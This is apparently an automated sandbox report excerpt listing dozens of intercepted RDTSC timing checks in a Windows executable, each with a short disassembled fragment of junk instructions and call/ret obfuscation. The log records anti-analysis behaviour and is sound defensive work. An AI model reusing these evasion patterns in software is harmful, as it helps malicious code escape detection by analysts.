                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA7E2 second address: 6FA7FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA7FC second address: 6FA801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA801 second address: 6FA815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66C0B351FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA815 second address: 6FA862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jl 00007F66C0B35957h 0x00000011 jmp 00007F66C0B35951h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jnl 00007F66C0B3595Dh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 pop eax 0x00000027 push edx 0x00000028 pop edx 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA862 second address: 6FA86C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66C0B351FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA9C7 second address: 6FA9CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B779B second address: 6B77BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35201h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F66C0B351F6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF97D second address: 6FF981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF981 second address: 6FF995 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F66C0B351F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF995 second address: 6FF999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF999 second address: 6FF9B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F66C0B351F6h 0x00000013 jmp 00007F66C0B351FBh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF9B7 second address: 6FF9BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF9BD second address: 6FF9DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F66C0B35208h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFB57 second address: 6FFB5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFCCE second address: 6FFCE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jne 00007F66C0B351F6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFCE2 second address: 6FFCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFE37 second address: 6FFE4D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66C0B351FAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jg 00007F66C0B351F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700185 second address: 70018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70032D second address: 700340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F66C0B351FCh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7004B0 second address: 7004C1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F66C0B35946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 703775 second address: 703792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F66C0B35202h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 703D16 second address: 703D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 703D1B second address: 703D45 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F66C0B35204h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66C0B351FEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7043E6 second address: 7043EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7043EA second address: 7043F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7044FE second address: 704505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7049A5 second address: 7049A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7049A9 second address: 7049B7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F66C0B35946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704EC6 second address: 704EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35202h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7057C5 second address: 7057CF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F66C0B35946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706ACC second address: 706B44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F66C0B351FCh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F66C0B351F8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 sbb si, 36F2h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F66C0B351F8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov edi, 1E527407h 0x0000004e push 00000000h 0x00000050 jmp 00007F66C0B35204h 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 pushad 0x0000005a popad 0x0000005b pop eax 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B44 second address: 706B62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F66C0B35953h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7074E5 second address: 7074EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7072DB second address: 7072E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7074EB second address: 70757E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F66C0B351FCh 0x0000000b pop ebx 0x0000000c popad 0x0000000d nop 0x0000000e movzx esi, bx 0x00000011 jbe 00007F66C0B35205h 0x00000017 jmp 00007F66C0B351FFh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F66C0B351F8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov esi, 1573DAE1h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F66C0B351F8h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 movzx esi, ax 0x0000005c push eax 0x0000005d pushad 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 jmp 00007F66C0B35207h 0x00000066 popad 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7072E0 second address: 7072E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707EE2 second address: 707EEC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66C0B351FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707EEC second address: 707F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F66C0B3594Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707F06 second address: 707F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708935 second address: 708939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708939 second address: 708955 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F66C0B351FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7093FC second address: 709417 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F66C0B35948h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d jnl 00007F66C0B35946h 0x00000013 pop esi 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70BD8C second address: 70BD91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A712 second address: 70A718 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A718 second address: 70A71D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D295 second address: 70D2A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66C0B3594Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D2A4 second address: 70D31E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F66C0B35209h 0x00000011 nop 0x00000012 mov ebx, dword ptr [ebp+122D1E87h] 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D2575h], ebx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007F66C0B351F8h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c xor dword ptr [ebp+122D24E2h], edx 0x00000042 mov edi, ebx 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F66C0B35204h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70E312 second address: 70E349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D2917h] 0x0000000e push 00000000h 0x00000010 ja 00007F66C0B35947h 0x00000016 push 00000000h 0x00000018 jc 00007F66C0B35948h 0x0000001e mov ebx, eax 0x00000020 xchg eax, esi 0x00000021 ja 00007F66C0B3594Eh 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70E349 second address: 70E34F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70E34F second address: 70E359 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66C0B3594Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7102F7 second address: 710375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F66C0B35204h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d jg 00007F66C0B351FCh 0x00000013 pop esi 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F66C0B351F8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f sbb edi, 6D892696h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F66C0B351F8h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 push 00000000h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710375 second address: 710379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710379 second address: 710387 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F66C0B351F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710387 second address: 71039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B3594Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71039F second address: 7103A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7123A1 second address: 7123B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F66C0B35946h 0x0000000b push edx 0x0000000c pop edx 0x0000000d jnp 00007F66C0B35946h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7123B5 second address: 7123D5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66C0B3520Ah 0x00000008 jmp 00007F66C0B35202h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7123D5 second address: 7123E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7123E4 second address: 7123EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7123EA second address: 7123EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE070 second address: 6BE07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F66C0B351F6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712B0A second address: 712B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714ACC second address: 714AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712BD6 second address: 712BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714AD0 second address: 714ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712BDA second address: 712BE0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714ADA second address: 714ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712BE0 second address: 712BE5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714ADE second address: 714B3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F66C0B351F8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D25F8h], esi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F66C0B351F8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 mov bx, A530h 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+122D2163h], edi 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714B3D second address: 714B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714B41 second address: 714B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715B90 second address: 715BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35951h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F66C0B35954h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717AD1 second address: 717ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007F66C0B351F6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717ADD second address: 717B3C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66C0B35946h 0x00000008 jmp 00007F66C0B35959h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jmp 00007F66C0B35951h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jc 00007F66C0B35946h 0x00000022 jmp 00007F66C0B35952h 0x00000027 jnp 00007F66C0B35946h 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717B3C second address: 717B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717B42 second address: 717B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C32A7 second address: 6C32AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C32AD second address: 6C32B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C32B3 second address: 6C32B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C32B9 second address: 6C32BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C32BF second address: 6C32C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C32C3 second address: 6C32E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F66C0B3594Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e jns 00007F66C0B35946h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C32E7 second address: 6C32F1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
